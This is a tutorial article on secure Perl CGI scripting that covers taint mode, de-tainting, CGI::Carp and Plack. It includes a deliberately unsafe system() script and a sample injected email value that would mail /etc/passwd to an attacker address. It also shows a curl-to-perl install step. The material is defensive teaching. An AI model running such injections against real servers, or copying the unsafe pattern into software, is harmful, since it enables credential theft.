Basics of Perl web portals

Summary: Perl is a powerful scripting language that can be used to perform small operations from the command line or power a complete web portal. Understanding techniques for making safe and secure Perl CGI scripts is vital to developing a web portal that does not compromise the integrity of a server or the web site's data. This article explains several techniques that will help developers create secure Perl CGI scripts and handle errors, before looking at a simpler method for building web applications like portals using the Plack system.

Tainted information

It sounds like an impossible prospect, but the only way to have a completely safe script is to use one that neither accepts data from the outside nor uses such data in an external connection or interface (such as running a command or connecting to a database). For some basic scripts, this can be perfectly reasonable.

But for the typical web application, accepting data from a form or another source, and then acting on that data, is precisely the reason you are using a scripted solution in the first place.

Using such data can have serious consequences. Consider the script in Listing 1:

Listing 1. Typical script

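#!/usr/bin/perl
use strict;
use warnings;
use CGI qw/:standard/;

# WARNING: deliberately unsafe example, do not use as-is
my $query = CGI->new();
my $email = $query->param('email');
# system() returns 0 on success, so compare explicitly before dying
system("mail $email") == 0 or die "Couldn't open mail";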

The script looks harmless enough, assuming that we always receive a valid email address. But because the email is sent using the system() function, the contents of the email address could be used to compromise the system. For example, imagine that the supplied email address was:

   example@example.com; cat /etc/passwd | mail hacker@example.com

Now the value contains not only a (possibly) valid email address but also an instruction to email your password file to somebody else. When system() is given a single string that contains shell metacharacters such as ; or |, it passes the whole string to a subshell (/bin/sh -c on Unix), which runs every command in it. This is a major security problem.
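The usual way to keep the shell out of the picture is to give system() or a piped open() a list instead of a single string: Perl then starts the program directly, with each list element as one argument, so ; and | arrive as ordinary characters. The sketch below uses echo in place of mail so that it can run anywhere. Note that under taint mode (described next) the value would still have to be de-tainted first, because taint checks apply to list arguments too.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hostile input of the kind shown above
my $input = 'example@example.com; cat /etc/passwd | mail hacker@example.com';

# List form of a piped open: 'echo' is started directly with $input as its
# only argument. No shell is involved, so ';' and '|' are just characters.
open my $fh, '-|', 'echo', $input
    or die "Couldn't run echo: $!";
my $output = do { local $/; <$fh> };
close $fh;

chomp $output;
print "echo received: $output\n";

# system() works the same way: system('mail', $email) passes $email as a
# single argument, whereas system("mail $email") hands the string to /bin/sh.
```

Because echo prints its argument unchanged, the whole hostile string comes back as text instead of a second command being run.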

Tracking the origin of different sources of information would be difficult were it not for a built-in Perl feature called taint mode. Perl enables taint mode automatically when it detects that the script is running with differing real and effective user or group IDs, and you can enable it explicitly with the -T option, either on the command line or on the shebang line at the start of the script (#!/usr/bin/perl -T).

With taint mode enabled, Perl tracks where each piece of data came from and refuses to let data from an untrusted source be used in an operation that could affect anything outside the script. As the name suggests, such untrusted data is classified as tainted.

Perl treats as tainted all command-line arguments, environment variables and locale information, the results of certain system calls (such as readdir(), readlink(), shmread() and msgrcv(), and the password, gcos and shell fields returned by the getpw*() functions), and all input read from files.

Tainted data cannot be used, directly or indirectly, in any command that invokes a subshell (including piped open() calls and the system() and exec() functions), nor in any command that modifies files, directories or processes (such as opening a file for writing, deleting it or renaming it).

There are some exceptions: the arguments to print() (and its relatives) and syswrite() are not checked for taintedness, nor are symbolic method calls and symbolic subroutine references, and hash keys are never tainted.

Taint checking also covers values that you don't pass to a command directly. For example, whenever you call system() or exec(), Perl checks the PATH environment variable, even if no tainted variable appears in the command line, because PATH determines which program actually runs. Since PATH is inherited from the environment, it is itself tainted until the script assigns it a known value. In addition, each directory in PATH must be absolute and must not be writable by anyone other than its owner and group; otherwise an attacker could place a program with the same name earlier in the search path and have your script run it instead.
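The directory rule above can be approximated in a few lines. The helper insecure_path_dirs() below is hypothetical and only mirrors the rule as described (absolute directories that others cannot write to); Perl's own check is built into the interpreter. The last two lines show the fix recommended in the perlsec documentation: set PATH to a fixed value and delete the other environment variables that shells consult.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: list the PATH entries that break the rule described
# above (each directory must be absolute and not writable by "others").
sub insecure_path_dirs {
    my ($path) = @_;
    my @bad;
    for my $dir (split /:/, $path) {
        if ($dir !~ m{\A/}) {              # empty or relative entry
            push @bad, $dir;
            next;
        }
        my @st = stat $dir or next;        # skip directories that do not exist
        push @bad, $dir if $st[2] & 0002;  # world-writable bit is set
    }
    return @bad;
}

# Report on the inherited PATH ...
print "Insecure PATH entry: '$_'\n" for insecure_path_dirs($ENV{PATH} // '');

# ... then apply the usual fix: a fixed PATH, and no environment variables
# that could change how a shell behaves.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
```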

With taint mode enabled, Perl stops the script with an error as soon as it detects tainted data being used unsafely. For example, an insecure PATH generates the following error:

Insecure $ENV{PATH} while running with -T switch at t.pl line 11

Using a tainted variable in a command raises this error instead:

Insecure dependency in system while running with -T switch at t2.pl line 2
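To reproduce both messages without setting up a web server, a small driver can run short snippets of Perl under -T and capture what they report. This is a sketch for experimentation: each snippet traps the fatal error with eval and prints it, and the tainted value comes from the snippet's command line (@ARGV), which taint mode always treats as tainted. The file name and line numbers in the captured messages will differ from the ones shown above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Run a snippet of Perl code under taint mode (-T), passing @args on its
# command line, and return everything the snippet prints.
sub run_under_taint {
    my ($code, @args) = @_;
    open my $fh, '-|', $^X, '-T', '-e', $code, @args
        or die "Couldn't start $^X: $!";
    my $output = do { local $/; <$fh> } // '';
    close $fh;
    return $output;
}

# 1. PATH is copied from tainted input, so system() refuses to run.
my $path_error = run_under_taint(
    q{ $ENV{PATH} = $ARGV[0];
       eval { system('echo', 'hello'); 1 } or print $@; },
    '/bin:/usr/bin',
);

# 2. PATH is clean, but the command string contains a tainted argument.
my $dependency_error = run_under_taint(
    q{ $ENV{PATH} = '/bin:/usr/bin';
       delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
       eval { system("echo $ARGV[0]"); 1 } or print $@; },
    'example@example.com',
);

print $path_error, $dependency_error;
```

In the second case the PATH is already safe, so the only remaining problem is the tainted value interpolated into the command string.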

In a typical web application, it is the user-supplied data from forms that is tainted, regardless of the method used to collect it. A CGI script receives that data either on standard input (for a POST request) or in environment variables such as QUERY_STRING (for a GET request), and Perl classes both sources as tainted.

To protect your script, you need to be able to identify this information and then de-taint it so that it is safe to use.
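In Perl, de-tainting is done by matching the value against a regular expression and keeping only the captured subpattern; perlsec describes referencing subpatterns from a match as the way to bypass the tainting mechanism. The sketch below applies this to the email address from Listing 1. The pattern is a deliberately conservative assumption, not a complete email validator: anything it rejects, including the injected command shown earlier, is refused rather than passed on.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Return a de-tainted copy of $email if it matches a conservative pattern,
# or undef if it does not. Under -T, the text captured in $1 is untainted,
# while the original argument stays tainted.
sub untaint_email {
    my ($email) = @_;
    return unless defined $email;
    # Assumed pattern: letters, digits and . _ % + - before the @, then
    # dot-separated labels. \A and \z anchor the whole string, so trailing
    # newlines, spaces or extra commands cannot slip through.
    if ($email =~ /\A([A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\z/) {
        return $1;
    }
    return;
}

for my $candidate ('example@example.com',
                   'example@example.com; cat /etc/passwd | mail hacker@example.com') {
    my $safe = untaint_email($candidate);
    print defined $safe ? "accepted: $safe\n" : "rejected: $candidate\n";
}
```

The design choice is to describe what a good value looks like rather than trying to list every dangerous character; a pattern that is too strict rejects some unusual but valid addresses, which is usually the safer failure.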

Using CGI::Carp

The usual way to report errors in a Perl script is with the warn() and die() functions. You might also use the Carp module, which gives you more control over the messages that you raise, particularly within modules.

An additional module, CGI::Carp, provides much of the same functionality as the Carp module. It is specially designed for web scripts, where you may want error information to go to a specific log rather than the default web server log (for example, the one written by Apache), or to appear in the web page in a controlled fashion.

The standard Carp module provides alternatives to the warn() and die() functions that report the location of an error more helpfully. When they are called from within a module, for example, the message gives the file and line number of the code that called the module, rather than a line inside the module itself.

The Carp module has four main functions: carp() is the equivalent of warn(), croak() is the equivalent of die() and terminates the script, and cluck() and confess() behave like warn() and die() respectively but also provide a stack backtrace from the point where the error was raised.
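A small sketch shows the difference in practice. The package My::Validator and its check_age() function are hypothetical, inlined in one file for the example; the point is that both the warning from carp() and the fatal error from croak() name the line in the calling code, where die() and warn() would name the line inside check_age().

```perl
#!/usr/bin/perl
use strict;
use warnings;

package My::Validator;    # hypothetical module, inlined for the example
use Carp qw(carp croak);

sub check_age {
    my ($age) = @_;
    # croak(): fatal, reported at the caller's line
    croak "age must be a whole number"
        unless defined $age && $age =~ /\A[0-9]+\z/;
    # carp(): a warning, also reported at the caller's line
    carp "age $age looks unusually high" if $age > 150;
    return $age;
}

package main;

# Collect warnings instead of letting them go to STDERR
my @warnings;
local $SIG{__WARN__} = sub { push @warnings, $_[0] };

my $warn_line = __LINE__ + 1;
My::Validator::check_age(200);

my $die_line = __LINE__ + 1;
eval { My::Validator::check_age('abc'); 1 };
my $error = $@;

print "warning: $warnings[0]";
print "error:   $error";
```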

If you use both the Carp and CGI::Carp modules, then the standard functions warn() and die(), and the Carp functions croak(), confess() and carp(), write their error information to STDERR, which the web server normally sends to its error log, with a date/time stamp and the name of the script added.

As an alternative to the HTTP server error log, CGI::Carp provides the carpout() function. It accepts a single argument: the filehandle of the file to which errors (normally sent to STDERR) should be written. carpout() is not imported by default, so you must import it explicitly. You can see a simple example in Listing 2.

Listing 2. Using CGI::Carp

  
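#!/usr/bin/perl
use strict;
use warnings;

use CGI::Carp qw/carpout/;
use IO::File;

# Open the log in append mode so that earlier entries are kept
my $logfile = IO::File->new('browser.log', 'a')
    or die "Couldn't open logfile: $!\n";

# From now on, warnings and errors go to browser.log instead of STDERR
carpout($logfile);

warn "Some error must have occurred\n";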

The information generated in the log is identified with both the date and the name of the script that generated the output:

[Thu Sep 2 11:35:56 2010] carpout.cgi: Some error must have occurred

All of these standard methods assume that you want your error information to go to a log file. But you may not always have access to the logs, or want to log in to the server just to read them.

The CGI::Carp module therefore also provides a fatalsToBrowser option that sends fatal error messages (from die(), croak() and confess()) to the browser as well as to the web server log, so that your users see the errors generated by the script. Non-fatal errors (from warn() and carp()) continue to go to the error log as normal.

To use it, specify it as an option when loading the CGI::Carp module:

use CGI::Carp qw/fatalsToBrowser/;

We can add this to our file browsing script to ensure that errors are correctly reported and identified.

Using Plack

Tainting and CGI::Carp both address low-level issues that remain a cause for concern. The low-level mechanics of CGI applications, such as parsing query arguments and outputting header material, can be simplified by using one of a number of web application frameworks, such as Catalyst or Dancer. Plack works with these frameworks but can also be used on its own, as demonstrated below.

Plack is Perl "super-glue" for web frameworks and web servers. It sits between your code (whether or not you use a web framework) and the web server (for example, Apache, Starman or FCGI). This means that you (and your framework) do not need to worry about the specifics of a web server, and vice versa.
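What makes this separation possible is the PSGI interface that Plack is built around: an application is simply a code reference that receives a hash of request data (the environment) and returns an array reference holding the status, the headers and the body. As a consequence, a PSGI application can be exercised without any web server at all. The sketch below builds a minimal environment by hand; a real server supplies many more keys, and only the two this app reads are filled in here.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# A PSGI application: a code reference that takes the environment hash
# and returns [ status, [ header => value, ... ], [ body chunks ] ].
my $app = sub {
    my ($env) = @_;
    my $method = $env->{REQUEST_METHOD};
    my $path   = $env->{PATH_INFO};
    return [
        200,
        [ 'Content-Type' => 'text/plain' ],
        [ "You sent $method $path\n" ],
    ];
};

# Call it directly with a hand-built (deliberately incomplete) environment
my $res = $app->({ REQUEST_METHOD => 'GET', PATH_INFO => '/hello' });

my ($status, $headers, $body) = @$res;
print "Status: $status\n";
print join('', @$body);
```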

Setting up Plack

Let's get you set up. We are going to use cpanm (from App::cpanminus) to download and install modules into your local::lib directory (so you do not need root access). This is shown in Listing 3.

Listing 3. Initial setup

# archive any existing cpan configuration
mv ~/.cpan ~/.cpan_original

# Then run ONE of the following:

# if you can run wget
wget -O - http://cpanmin.us/ | perl - local::lib App::cpanminus && \
  echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc

# OR if you can run curl
curl -L http://cpanmin.us/ | perl - local::lib App::cpanminus && \
  echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc

# otherwise, download the contents of http://cpanmin.us to a file called
# cpanmin.us, make it executable and then run it:
chmod +x cpanmin.us
./cpanmin.us local::lib App::cpanminus && \
  echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc

With cpanm available, install the core Plack modules that are required to build web applications quickly and easily, as shown in Listing 4.

Listing 4. Installing Plack with cpanminus

 
cpanm Task::Plack 
# Please also run this as we will use it later 
cpanm Plack::Middleware::TemplateToolkit

The perl5 folder in your home directory will now have all the modules you need. The next step is to create a .psgi configuration file which will allow us to return a web page (see Listing 5 below).

Listing 5. Creating a .psgi configuration file

 
# Tell Perl where our lib is (ALWAYS use this) 
use lib "$ENV{HOME}/perl5/lib/perl5"; 

# ensure we declare everything correctly (ALWAYS use this) 
use strict; 

# Give us diagnostic warnings where possible (ALWAYS use this) 
use warnings; 

# Allow us to build our application 
use Plack::Builder; 

# A basic app 
my $default_app = sub { 
    my $env = shift; 
    return [ 
        200, # HTTP Status code 
        [ 'Content-Type' => 'text/html' ], # HTTP Headers, 
        ["All is good"] # Content 
    ];
}; 

# Return the builder 
return builder {
    $default_app; 
}

Save this to a file called 1.psgi, then start your web server from the command line with the plackup command:

plackup 1.psgi

You will see:

HTTP::Server::PSGI: Accepting connections at http://SERVER_IP:5000/

Using your web browser, go to http://SERVER_IP:5000/. If you are developing on your desktop computer, then http://localhost:5000/ will work. You should now see a page with "All is good". In fact, you will see the same page for any URL, such as http://localhost:5000/any_page.html, because the application always returns this response, irrespective of the request.
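As a sketch of how the application could take the request into account, the variation below reads PATH_INFO from the environment and returns a 404 for anything other than the root URL. It is plain PSGI, so the sub could replace $default_app in 1.psgi; here it is called directly to check both branches. The 404 body text is an arbitrary choice for the example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Answer "All is good" only for the root URL; everything else gets a 404
my $default_app = sub {
    my ($env) = @_;
    my $path = $env->{PATH_INFO} // '';
    # Treat an empty PATH_INFO the same as '/'
    if ($path eq '' || $path eq '/') {
        return [ 200, [ 'Content-Type' => 'text/html' ], ['All is good'] ];
    }
    return [ 404, [ 'Content-Type' => 'text/plain' ], ['Not found'] ];
};

# Direct calls, without a server, to check both branches
for my $path ('/', '/any_page.html') {
    my $res = $default_app->({ PATH_INFO => $path });
    print "$path -> $res->[0]\n";
}
```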

You will notice that on the command line you can see the access logs for the web server. This is because Plack defaults to development mode and turns on a few extra middleware layers for you, specifically AccessLog, StackTrace and Lint.

To see StackTrace in operation, comment out the content line of 1.psgi by adding a hash (#) in front of it: # ["All is good"] # Content.

Restart plackup (press Ctrl+C to stop the process, then run plackup 1.psgi to start it again). Now go to http://localhost:5000/ in your web browser again and you will see a stack trace of the error. Note the main error message at the top of the page: "response needs to be 3 element array, or 2 element in streaming". You can then follow each step of the trace, and click the Show function arguments and Show lexical variables links under any section of the trace to help debug the issue.
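The message reflects a rule of the PSGI response format: a finished response is a three-element array, and only a streaming response may start with a two-element array of status and headers. The helper below, response_shape_error(), is hypothetical and is a simplified sketch of just that one rule, not the code of Plack::Middleware::Lint, which performs many more checks.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical, simplified version of the rule behind the message
# "response needs to be 3 element array, or 2 element in streaming".
# Returns an error string, or undef if the shape is acceptable.
sub response_shape_error {
    my ($res, $streaming) = @_;
    return 'response must be an array reference' unless ref $res eq 'ARRAY';
    return if @$res == 3;
    return if $streaming && @$res == 2;
    return 'response needs to be 3 element array, or 2 element in streaming';
}

# The working response from 1.psgi, and the one with the content commented out
my $good   = [ 200, [ 'Content-Type' => 'text/html' ], ['All is good'] ];
my $broken = [ 200, [ 'Content-Type' => 'text/html' ] ];

for my $res ($good, $broken) {
    my $error = response_shape_error($res);
    print defined $error ? "error: $error\n" : "ok\n";
}
```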

Remove the # and restart, so we have a working .psgi file again.

Development

The plackup command accepts several command-line arguments; running perldoc plackup shows the documentation. The most used is -r (or --reload), which tells plackup to monitor your .psgi file and restart the server when it changes (if you have a lib directory alongside your .psgi file, it is monitored too):

plackup -r 1.psgi

Extending your application

Plack already includes many useful applications that you may want to integrate with your web portal. In Listing 6, for example, we use Plack::App::Directory to get a directory listing and to serve its contents as static files, and Plack::App::URLMap to choose the URL on which this application is mounted.

Listing 6. Second .psgi configuration file

 
use lib "$ENV{HOME}/perl5/lib/perl5"; 
use strict; 
use warnings; 
use Plack::Builder; 

# 'mount' applications on specific URLs 
use Plack::App::URLMap; 

# Get directory listings and serve files 
use Plack::App::Directory; 

my $default_app = sub { 
    my $env = shift; 
    return [ 200, [ 'Content-Type' => 'text/html' ], ["All is good"] ];
}; 

# Get the Directory app, configured with a root directory 
my $dir_app = Plack::App::Directory->new( { root => "/tmp/" } )->to_app; 

# Create a mapper object
my $mapper = Plack::App::URLMap->new(); 

# mount our apps on urls 
$mapper->mount('/' => $default_app); 
$mapper->mount('/tmp' => $dir_app); 

# extract the new overall app from the mapper 
my $app = $mapper->to_app(); 

# Return the builder 
return builder { 
    $app; 
}

The code in Listing 6 mounts $dir_app on /tmp (open http://localhost:5000/tmp/), while requests for / and any other path still fall through to $default_app (open http://localhost:5000/anything_else.html).
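To make the mounting behaviour concrete, here is a much-simplified sketch of the idea, written without Plack. It illustrates the concept and is not Plack::App::URLMap's implementation, which also handles host-based mounts and other details: the longest matching prefix wins, the mount point moves from PATH_INFO into SCRIPT_NAME, and / catches everything else. The mount_apps() helper and the two stand-in apps are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: build one PSGI app that dispatches on URL prefixes
sub mount_apps {
    my (%mounts) = @_;
    # Try longer prefixes first so that '/tmp' wins over '/'
    my @prefixes = sort { length $b <=> length $a } keys %mounts;
    return sub {
        my ($env) = @_;
        my $path = $env->{PATH_INFO} // '';
        for my $prefix (@prefixes) {
            (my $location = $prefix) =~ s{/\z}{};    # '/' becomes ''
            # Match the prefix only at a path boundary ('/tmpfile' is not '/tmp')
            next unless $path =~ m{\A\Q$location\E(/.*|)\z}s;
            my $rest = $1;
            # Move the mount point from PATH_INFO to SCRIPT_NAME
            local $env->{SCRIPT_NAME} = ($env->{SCRIPT_NAME} // '') . $location;
            local $env->{PATH_INFO}   = $rest;
            return $mounts{$prefix}->($env);
        }
        return [ 404, [ 'Content-Type' => 'text/plain' ], ['Not Found'] ];
    };
}

# Stand-ins for $default_app and $dir_app: each reports what it was given
my $default_app = sub {
    my ($env) = @_;
    return [ 200, [ 'Content-Type' => 'text/plain' ], ["default: $env->{PATH_INFO}"] ];
};
my $dir_app = sub {
    my ($env) = @_;
    return [ 200, [ 'Content-Type' => 'text/plain' ],
             ["dir: $env->{SCRIPT_NAME} $env->{PATH_INFO}"] ];
};

my $app = mount_apps('/' => $default_app, '/tmp' => $dir_app);

for my $path ('/tmp/notes.txt', '/anything_else.html') {
    my $res = $app->({ PATH_INFO => $path, SCRIPT_NAME => '' });
    print "$path -> $res->[2][0]\n";
}
```

Moving the prefix into SCRIPT_NAME is what lets the mounted application work out its own URLs without knowing where it was mounted.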

More middleware and apps

There are many Plack::App and Plack::Middleware modules available to help with common tasks. We are going to look at Plack::Middleware::TemplateToolkit, which processes files through the Template Toolkit (TT) templating engine. Images and other static content should not go through TT, so we are going to configure Plack::Middleware::Static to serve files with specific extensions directly. On top of this, we want a nice-looking page when a file is not found (a 404 error); for this we will use Plack::Middleware::ErrorDocument. All the code we need to add is shown in Listing 7.

Listing 7. The Plack::Middleware::TemplateToolkit module

   
# Load the modules used below
use Plack::Builder;
use Plack::Middleware::TemplateToolkit;

# A link to your htdocs root folder
my $root = '/path/to/htdocs/';

# Create a new Template Toolkit application (which we will default to)
my $default_app = Plack::Middleware::TemplateToolkit->new(
    INCLUDE_PATH => $root,    # Required
)->to_app();

return builder {

    # Page to show when the requested file is missing
    # (this page is not processed with TT)
    enable "Plack::Middleware::ErrorDocument",
        404 => "$root/page_not_found.html";

    # Files with these extensions are served directly;
    # (?:...) groups the alternative extensions after the dot
    enable "Plack::Middleware::Static",
        path => qr{\.(?:gif|png|jpg|swf|ico|mov|mp3|pdf|js|css)$}i,
        root => $root;

    # Our application
    $default_app;
}
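The Static path pattern needs to be an alternation rather than a bracketed list: square brackets create a character class, so a pattern such as qr{[gif|png|jpg]$} matches any path whose last character is one of g, i, f, |, p, n or j, not one of the listed extensions. The short check below compares the two forms; the file names are made up for the example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Character class: matches if the LAST CHARACTER is any of the bracketed ones
my $char_class  = qr{[gif|png|jpg|swf|ico|mov|mp3|pdf|js|css]$};
# Alternation: matches if the path ENDS WITH one of the listed extensions
my $alternation = qr{\.(?:gif|png|jpg|swf|ico|mov|mp3|pdf|js|css)$}i;

for my $path ('/logo.png', '/index.html', '/news', '/about.htm') {
    printf "%-12s char class: %-3s alternation: %s\n",
        $path,
        ($path =~ $char_class  ? 'yes' : 'no'),
        ($path =~ $alternation ? 'yes' : 'no');
}
```

With the character class, /news and /about.htm would be served as static files and bypass TT, even though neither has one of the listed extensions.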

At this stage, it is probably worth investigating one of the many web frameworks that offer PSGI support and can be run with Plack. These frameworks offer structure and support for doing more complex tasks. Have a look at Catalyst, Mojolicious, or Dancer. The Perl.org web frameworks white paper (see Resources for a link) discusses just a few of the advantages of using a framework.

Conclusion

Parsing and using web data within a Perl web portal script is complex because the information that you receive from users must be secured. Once your Perl script grants access to the underlying filesystem, you must ensure that the script cannot be used to reach files that you do not want accessible to the outside world.

Plack doesn't eliminate the need to worry about these issues, but it does make the process of building advanced web applications much easier. It handles the complexities of communicating between your web server and your Perl application, and provides a simplified environment in which to build web applications.